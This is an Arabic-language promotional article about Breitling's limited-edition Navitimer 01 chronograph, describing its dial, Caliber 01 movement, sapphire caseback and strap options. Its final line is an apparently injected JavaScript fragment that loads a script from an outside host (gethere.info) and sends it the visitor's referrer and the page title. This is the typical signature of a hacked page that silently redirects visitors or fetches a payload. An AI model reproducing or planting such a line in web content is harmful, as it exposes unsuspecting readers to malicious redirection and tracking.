’ بريتلينغ‘ تطرح ساعة ’ نافيتايمر 01 ليمتد أديشن‘ بالإصدار المحدود

كشفت ’بريتلينغ‘، الشركة السويسرية العريقة لتصنيع الساعات الفاخرة، عن الوجه الجديد للعلامة التجارية الأسطورية في مجال صناعة الساعات وعالم الطيران عبر طرحها لنسخة جديدة من ساعة ’نافيتايمر‘الشهيرة بإصدار محدود من 1,000 ساعة تحمل اسم ’نافيتايمر 01 ليمتد أديشن‘ (Navitimer 01 Limited Edition). وتتألّق هذه النسخة الجديدة من خلال مينا باللون الرمادي الداكن يحتوي على عدّادات سوداء، وهي مزوّدة بنظام حركة ’بريتلينغ‘ بأداة ثقل متذبذب باللون الأسود.

تتميّز ساعة ’نافيتايمر‘ الكلاسيكية العريقة بتصميمها الرائع القابل دوماً للتجدّد مع مرور الوقت. وكان قد تم ابتكارها أولاً في العام 1952، وخلال فترة تزيد عن 60 سنة أرست لنفسها مكانة بارزة كأداة أساسية للمحترفين في عالم الطيران وهي أرقى ساعات الكرونوغراف الميكانيكية التي يتم إنتاجها في العالم، وبالتالي تتألّق على أيدي الطيّارين أثناء تنفيذهم للمناورات الرائعة في طائراتهم.

تشمل الجهة الأمامية أداة قياس الطيران الدائرية الشهيرة التي تعكس الروابط القوية بين ’بريتلينغ‘ وعالم الطيران، أما الجهة الخلفية فتتيح إطلالة على نواحٍ أخرى من مزايا العلامة التجارية والتي تؤكّد على نجاح الشركة بين أوساط الطيّارين، حيث تظهر من خلال الخلفية أجزاء نظام الحركة الميكانيكية الكرونوغرافية الدقيقة والبارعة.

تعمل ساعة ’نافيتايمر 01 ليمتد أديشن‘ عبر نظام حركة ’بريتلينغ كاليبر 01‘ (Manufacture Breitling Caliber 01). وهذا ’المحرّك‘ عالي الأداء قد جرى تطويره وإنتاجه بالكامل في معامل الشركة وتمت المصادقة عليه من المعهد السويسري الرسمي لاختبار كرونومتر الساعات‘ (COSC)، مما يضمن أعلى مستويات الدقّة والاعتمادية التي لا تُضاهى. وانعكاساً لمزايا الإصدار المحدود، فإن أداة الثقل المتذبذب التي تظهر عبر الغطاء الخلفي من كريستال الصفيّر الشفّاف تتميّز بطلائها الأسود مما يمنح لمسة فاخرة حقيقية للساعة.

تأتي ساعة ’نافيتايمر 01 ليمتد أديشن‘ بسوار فولاذي أو برباط جلدي أو آخر من جلد التمساح بألوان متعدّدة.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;